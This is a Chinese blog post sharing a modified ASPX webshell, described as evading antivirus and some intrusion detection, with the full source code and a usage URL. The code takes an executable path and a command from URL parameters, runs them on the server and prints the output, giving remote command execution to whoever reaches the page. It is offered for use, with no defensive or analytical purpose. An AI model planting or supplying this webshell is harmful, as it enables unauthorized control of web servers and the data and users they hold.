发个免杀修改的aspx提权马

6,742次阅读
没有评论

共计 2696 个字符,预计需要花费 7 分钟才能阅读完成。 

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Web.UI"%>
<%@ import Namespace="System.Runtime.InteropServices"%>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ Import Namespace="System.Threading"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<%@ import Namespace="Microsoft.VisualBasic"%>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
protected void Page_load(object sender,EventArgs e)
{
  string ok = Request.QueryString["sb"];
  string shell= Request.QueryString["shell"];
  //www.moonsec.com moon
  Response.Write(shell + ok );
  Response.Write("<pre>");
  Response.Write(GetCmd(ok,shell));
  Response.Write("</pre>");
}
private string GetCmd(string cmd,string shell)
{
  string ok = string.Empty;
   Process p = new Process();
            p.StartInfo.FileName = shell;
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.RedirectStandardInput = true;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.RedirectStandardError = true;
            p.StartInfo.CreateNoWindow = true;
            string strOutput = null;
            try
            {
                p.Start();
                p.StandardInput.WriteLine(cmd);
Response.Write(cmd);
                p.StandardInput.WriteLine("exit");
                ok = p.StandardOutput.ReadToEnd();
                p.WaitForExit();
                p.Close();
             }
            catch (Exception ex)
             {
  Response.Write("<pre>");
  Response.Write(ex);
  Response.Write("/<pre>");
                 }
  return ok;
}
</script>
</head>
<body>
</body>
</html>

能绕过一些查询ids的。并且有调试信息输出,方便我们查看原因。 

用法

https://arvinhk.com/arvin.aspx?shell=C:\WINDOWS\system32\cmd.exe&sb=ipconfig

发个免杀修改的aspx提权马


正文完
aspx提权 免杀
发表至: 其他资源
2015-06-30
 0
admin
版权声明:本站原创文章,由 admin 于2015-06-30发表,共计2696字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
一家黑客工具开发商被黑了,还扯出很多秘密
你不知道的黑客世界:近一半单身 10%是处女座
微软东莞工厂将关:员工获N+3+双年终奖补偿
Windows行不行,就看下周三的发布会了
评论(没有评论)
验证码
文章搜索
一言一句话
-「
标签云
.net0day12306360360不正当竞争360安全卫士3GAcrobat X ProAcrylicadminAdobeAdobe IllustratorADsafeALGORITHMAndroidAndroid KillerAndroid逆向AndroratAPI函数ApkIDEAppleaspx提权Assist.XAvastA记录BandicamBioreactor DesignBurp SuiteC++CADCCNACCNA学习指南CCNPChappieChrChrWCISCOClassWizardCMS识别cookie劫持CS6CTB-LockerCVE-2014-9222D3D游戏DarkShellDDOSDecompilerDirectXDiscuzDLL编程